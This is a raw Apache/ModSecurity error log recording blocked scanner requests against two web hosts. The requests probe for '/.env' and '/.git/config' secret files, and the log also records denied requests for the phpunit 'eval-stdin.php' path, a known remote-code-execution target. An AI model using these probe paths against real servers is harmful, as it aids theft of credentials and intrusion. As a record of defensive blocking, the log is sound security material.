[Mon Jul 29 09:31:06.890252 2024] [:error] [pid 788048] [client 45.148.10.230:50658] [client 45.148.10.230] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZqdFOgM7aICIrHy6_vJwAAAAAAM"]
[Mon Jul 29 09:31:06.890766 2024] [:error] [pid 788048] [client 45.148.10.230:50658] [client 45.148.10.230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZqdFOgM7aICIrHy6_vJwAAAAAAM"]
[Mon Jul 29 09:31:06.891138 2024] [:error] [pid 788048] [client 45.148.10.230:50658] [client 45.148.10.230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZqdFOgM7aICIrHy6_vJwAAAAAAM"]
[Fri Aug 02 03:56:49.815721 2024] [:error] [pid 878958] [client 45.148.10.142:60240] [client 45.148.10.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zqw84T5LKyV9MmG5GddXZgAAAAA"]
[Fri Aug 02 03:56:49.817379 2024] [:error] [pid 878958] [client 45.148.10.142:60240] [client 45.148.10.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zqw84T5LKyV9MmG5GddXZgAAAAA"]
[Fri Aug 02 03:56:49.817845 2024] [:error] [pid 878958] [client 45.148.10.142:60240] [client 45.148.10.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zqw84T5LKyV9MmG5GddXZgAAAAA"]
[Fri Aug 02 03:56:49.849918 2024] [:error] [pid 878959] [client 45.148.10.142:60244] [client 45.148.10.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Zqw84XyVnEFU_cRkFm6jDwAAAAE"]
[Fri Aug 02 03:56:49.850578 2024] [:error] [pid 878959] [client 45.148.10.142:60244] [client 45.148.10.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Zqw84XyVnEFU_cRkFm6jDwAAAAE"]
[Fri Aug 02 03:56:49.851012 2024] [:error] [pid 878959] [client 45.148.10.142:60244] [client 45.148.10.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Zqw84XyVnEFU_cRkFm6jDwAAAAE"]
[Fri Aug 02 11:07:02.501833 2024] [:error] [pid 878962] [client 162.240.148.46:53478] [client 162.240.148.46] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zqyhtnh6UoFkajuW-kvb_QAAAAQ"]
[Fri Aug 02 11:07:02.502537 2024] [:error] [pid 878962] [client 162.240.148.46:53478] [client 162.240.148.46] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zqyhtnh6UoFkajuW-kvb_QAAAAQ"]
[Fri Aug 02 11:07:02.503057 2024] [:error] [pid 878962] [client 162.240.148.46:53478] [client 162.240.148.46] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zqyhtnh6UoFkajuW-kvb_QAAAAQ"]
[Fri Aug 02 11:07:05.971998 2024] [authz_core:error] [pid 878959] [client 162.240.148.46:54116] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
[Fri Aug 02 12:32:45.321885 2024] [:error] [pid 878960] [client 162.240.148.46:33006] [client 162.240.148.46] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zqy1zZ981mvUZfgdbJ_s7gAAAAI"]
[Fri Aug 02 12:32:45.322645 2024] [:error] [pid 878960] [client 162.240.148.46:33006] [client 162.240.148.46] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zqy1zZ981mvUZfgdbJ_s7gAAAAI"]
[Fri Aug 02 12:32:45.323106 2024] [:error] [pid 878960] [client 162.240.148.46:33006] [client 162.240.148.46] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Zqy1zZ981mvUZfgdbJ_s7gAAAAI"]
[Fri Aug 02 12:32:48.953234 2024] [authz_core:error] [pid 878959] [client 162.240.148.46:33788] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
[Fri Aug 02 13:20:08.689977 2024] [:error] [pid 879162] [client 162.240.148.46:58534] [client 162.240.148.46] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZqzA6Bb3HnTfG4nbAS_59wAAAAY"]
[Fri Aug 02 13:20:08.690690 2024] [:error] [pid 879162] [client 162.240.148.46:58534] [client 162.240.148.46] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZqzA6Bb3HnTfG4nbAS_59wAAAAY"]
[Fri Aug 02 13:20:08.691136 2024] [:error] [pid 879162] [client 162.240.148.46:58534] [client 162.240.148.46] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZqzA6Bb3HnTfG4nbAS_59wAAAAY"]
[Fri Aug 02 13:20:12.642017 2024] [authz_core:error] [pid 878958] [client 162.240.148.46:59158] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
[Sat Aug 03 01:32:20.817076 2024] [:error] [pid 899900] [client 45.148.10.206:56694] [client 45.148.10.206] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zq1shOsnRgZIJQmE3b2bzAAAAAM"]
[Sat Aug 03 01:32:20.817799 2024] [:error] [pid 899900] [client 45.148.10.206:56694] [client 45.148.10.206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zq1shOsnRgZIJQmE3b2bzAAAAAM"]
[Sat Aug 03 01:32:20.818215 2024] [:error] [pid 899900] [client 45.148.10.206:56694] [client 45.148.10.206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Zq1shOsnRgZIJQmE3b2bzAAAAAM"]
[Sat Aug 03 01:32:21.706539 2024] [:error] [pid 899898] [client 45.148.10.206:56710] [client 45.148.10.206] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zq1shapYLlfxsOtnHaT6fAAAAAE"]
[Sat Aug 03 01:32:21.707132 2024] [:error] [pid 899898] [client 45.148.10.206:56710] [client 45.148.10.206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zq1shapYLlfxsOtnHaT6fAAAAAE"]
[Sat Aug 03 01:32:21.707554 2024] [:error] [pid 899898] [client 45.148.10.206:56710] [client 45.148.10.206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Zq1shapYLlfxsOtnHaT6fAAAAAE"]
[Mon Aug 05 01:24:46.439277 2024] [:error] [pid 944739] [client 45.148.10.148:56910] [client 45.148.10.148] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZrANvrDHEuOJ0MPBB1GMlAAAAAY"]
[Mon Aug 05 01:24:46.439913 2024] [:error] [pid 944739] [client 45.148.10.148:56910] [client 45.148.10.148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZrANvrDHEuOJ0MPBB1GMlAAAAAY"]
[Mon Aug 05 01:24:46.440358 2024] [:error] [pid 944739] [client 45.148.10.148:56910] [client 45.148.10.148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZrANvrDHEuOJ0MPBB1GMlAAAAAY"]
[Mon Aug 05 06:43:06.877194 2024] [:error] [pid 946938] [client 45.148.10.142:35758] [client 45.148.10.142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZrBYWq3RMaqOfO4v5olG8AAAAAE"]
[Mon Aug 05 06:43:06.877860 2024] [:error] [pid 946938] [client 45.148.10.142:35758] [client 45.148.10.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZrBYWq3RMaqOfO4v5olG8AAAAAE"]
[Mon Aug 05 06:43:06.878505 2024] [:error] [pid 946938] [client 45.148.10.142:35758] [client 45.148.10.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZrBYWq3RMaqOfO4v5olG8AAAAAE"]
[Mon Aug 05 17:17:42.190113 2024] [:error] [pid 946955] [client 45.148.10.241:47116] [client 45.148.10.241] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZrDtFi9JmxDt5TC70NrqLQAAAAs"]
[Mon Aug 05 17:17:42.190800 2024] [:error] [pid 946955] [client 45.148.10.241:47116] [client 45.148.10.241] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZrDtFi9JmxDt5TC70NrqLQAAAAs"]
[Mon Aug 05 17:17:42.191218 2024] [:error] [pid 946955] [client 45.148.10.241:47116] [client 45.148.10.241] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZrDtFi9JmxDt5TC70NrqLQAAAAs"]
[Mon Aug 05 19:06:19.114856 2024] [:error] [pid 946941] [client 45.148.10.206:59954] [client 45.148.10.206] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZrEGi7pXQ0Rx141QHv8MkwAAAAQ"]
[Mon Aug 05 19:06:19.115489 2024] [:error] [pid 946941] [client 45.148.10.206:59954] [client 45.148.10.206] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZrEGi7pXQ0Rx141QHv8MkwAAAAQ"]
[Mon Aug 05 19:06:19.115913 2024] [:error] [pid 946941] [client 45.148.10.206:59954] [client 45.148.10.206] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZrEGi7pXQ0Rx141QHv8MkwAAAAQ"]
[Tue Aug 06 15:31:17.006942 2024] [:error] [pid 970073] [client 47.128.239.1:40482] [client 47.128.239.1] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZrIlpWL8QnML1VCSeSAqigAAAAA"]
[Tue Aug 06 15:31:17.007648 2024] [:error] [pid 970073] [client 47.128.239.1:40482] [client 47.128.239.1] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZrIlpWL8QnML1VCSeSAqigAAAAA"]
[Tue Aug 06 15:31:17.008136 2024] [:error] [pid 970073] [client 47.128.239.1:40482] [client 47.128.239.1] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZrIlpWL8QnML1VCSeSAqigAAAAA"]
